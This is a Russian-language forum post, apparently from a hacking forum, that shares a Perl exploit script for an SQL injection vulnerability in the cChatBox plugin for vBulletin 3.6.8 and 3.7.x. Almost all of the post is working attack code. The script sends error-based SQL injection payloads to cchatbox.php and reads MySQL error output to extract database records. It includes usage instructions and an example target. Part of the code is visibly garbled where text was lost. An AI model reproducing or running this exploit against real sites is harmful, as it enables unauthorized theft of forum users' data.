08.08.2011, 22:21
|
|
Новичок
Регистрация: 19.05.2011
Сообщений: 26
С нами:
7886486
Репутация:
-1
|
|
cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability
Код:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$ua->agent("MyApp/0.1 ");
print "##################################\n";
print "############ EXPLOIT #############\n";
print "##################################\n";
print "## Portal: cchatbox ##\n";
print "## Bug: SQLI ##\n";
print "## Author: DSecurity ##\n";
print "## Coder: vv0lll ##\n";
print "##################################\n";
print "Use: exploit.pl address number_user sleeptime\n";
print "Example: exploit.pl http://localhost/vbb 10 10\n";
if(@ARGV new(POST => $ARGV[0].'/cchatbox.php');
$req->content_type('application/x-www-form-urlencoded');
$req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
#print $res->content;
if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
{$test = $3};
sleep($sleep);
return $print.$test."\n";
}
|
|
|